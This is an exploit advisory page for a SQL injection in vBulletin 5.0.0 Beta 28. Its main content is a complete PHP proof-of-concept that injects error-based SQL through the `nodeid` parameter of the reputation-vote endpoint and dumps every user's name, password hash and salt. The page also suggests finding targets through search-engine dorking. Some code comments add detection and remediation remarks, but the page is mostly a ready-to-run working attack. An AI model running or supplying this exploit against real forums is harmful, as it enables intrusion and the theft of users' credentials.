vBulletin 5.0.0 Beta 28 SQL Injection
vBulletin 5.0.0 Beta 28 SQL Injection
=============================================================================================================================================
| # Title : vBulletin 5.0.0 Beta 28 SQL Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.vbulletin.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

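[+] Code Description: SQL injection vulnerability in vBulletin 5. The PoC below sends SQL through the `nodeid` parameter of the reputation-vote AJAX endpoint and reads usernames, password hashes and salts back out of the database error page.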

(Related: https://packetstorm.news/files/id/180631/ — linked CVE: CVE-2013-3522.)

[+] save code as poc.php.

[+] Set target : line 70

[+] PayLoad :

<?php

/**
 * Proof-of-concept client for the SQL injection this page attributes to
 * vBulletin 5.0.0 Beta 28 (the page links it to CVE-2013-3522).
 *
 * What the code does, as visible here: it POSTs a `nodeid` form field to
 * `/index.php/ajax/api/reputation/vote`, appends SQL text to the numeric node
 * id, and reads query results back out of the database error page the server
 * returns.
 *
 * Reviewer notes for defenders:
 *  - Request signature: POST to the endpoint above whose `nodeid` value is not
 *    purely numeric. A server-side integer cast/validation of `nodeid` would
 *    reject this input (the server-side code is not shown on this page).
 *  - Response signature: bodies containing "Database error in vBulletin".
 *    The read-back depends on database error detail being returned to the
 *    client; suppressing it removes this channel but not the injection itself.
 *  - Remediation is the vendor-fixed release; the fixed version is not stated
 *    on this page.
 */
class VBulletinSQLiExploit {
// Base URL of the forum, stored without a trailing slash.
private $target;
// Inclusive lower bound of the node-id range probed by findValidNode().
private $minNode;
// Inclusive upper bound of the node-id range probed by findValidNode().
private $maxNode;

/**
 * @param string $target  Base URL; any trailing "/" is stripped.
 * @param int    $minNode First node id to probe (default 1).
 * @param int    $maxNode Last node id to probe (default 100).
 */
public function __construct($target, $minNode = 1, $maxNode = 100) {
$this->target = rtrim($target, '/');
$this->minNode = $minNode;
$this->maxNode = $maxNode;
}

/**
 * Sends one form-encoded POST to the reputation-vote endpoint.
 *
 * No timeout, header or TLS option is set here, so libcurl defaults apply.
 *
 * @param array $data Form fields; callers in this class pass only `nodeid`.
 * @return string|false Response body, or false when curl_exec() fails.
 */
private function sendRequest($data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$this->target/index.php/ajax/api/reputation/vote");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
// Return the body as a string instead of printing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

/**
 * Runs one sub-query through the `nodeid` parameter and returns its result
 * as echoed in the server's database error page.
 *
 * @param int|string $node  Node id placed in front of the injected text.
 * @param string     $query Sub-query whose result is wrapped in the marker.
 * @return string|null Text found between the two markers, or null when the
 *                     error banner or the markers are absent.
 */
private function doSQLi($node, $query) {
// 8 random hex characters, used to delimit the result in the response.
$mark = bin2hex(random_bytes(4));
// Closes the original expression and adds a sub-select that makes the
// database raise an error whose message carries the marker-wrapped result.
$injection = ") AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT('$mark', ($query), '$mark') FROM information_schema.tables LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x) a) -- ";

// The field value is "<node id><SQL text>"; a legitimate node id would
// presumably be digits only, which is what input validation can key on.
$data = ['nodeid' => "$node$injection"];
$res = $this->sendRequest($data);

// Both conditions must hold: the vBulletin error banner is present and the
// marker pair surrounds some text (non-greedy match).
if (strpos($res, "Database error in vBulletin") !== false && preg_match("/$mark(.*?)$mark/", $res, $matches)) {
return $matches[1];
}
return null;
}

/**
 * Reports whether a probe with a constant sub-query produced a marked result
 * for the given node id.
 *
 * @param int $id Node id to test.
 * @return bool
 */
private function existsNode($id) {
return $this->doSQLi($id, "SELECT '1'") !== null;
}

/**
 * Walks the configured range in ascending order, one request per id.
 *
 * @return int|null First id for which existsNode() is true, else null.
 */
private function findValidNode() {
for ($i = $this->minNode; $i <= $this->maxNode; $i++) {
if ($this->existsNode($i)) return $i;
}
return null;
}

/**
 * Drives the whole run and prints progress and results to standard output.
 *
 * Traffic pattern visible in the code: one request per probed node id, one
 * for the row count, then three per row of the `user` table (username,
 * password, salt). Each of those requests yields a database error response,
 * so the run appears as a burst of POSTs to one endpoint in web access logs
 * and, where database errors are logged, as a matching burst there.
 *
 * @return void
 */
public function exploit() {
echo "[+] Searching for a valid node...\n";
$node = $this->findValidNode();
if (!$node) {
echo "[-] No valid node found.\n";
return;
}
echo "[+] Using Node ID: $node\n";

$userCount = $this->doSQLi($node, "SELECT COUNT(*) FROM user");
echo "[+] Found $userCount users.\n";

// One row per iteration, selected by offset; three separate requests each.
for ($i = 0; $i < $userCount; $i++) {
$username = $this->doSQLi($node, "SELECT username FROM user LIMIT $i,1");
$password = $this->doSQLi($node, "SELECT password FROM user LIMIT $i,1");
$salt = $this->doSQLi($node, "SELECT salt FROM user LIMIT $i,1");
echo "[*] User: $username | Hash: $password | Salt: $salt\n";
}
}
}

// Script entry point: runs as soon as the file is executed.
// "http://target.com" is the page's placeholder host. Only the target is
// passed, so the constructor defaults (node ids 1..100) apply.
$exploit = new VBulletinSQLiExploit("http://target.com");
$exploit->exploit();





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================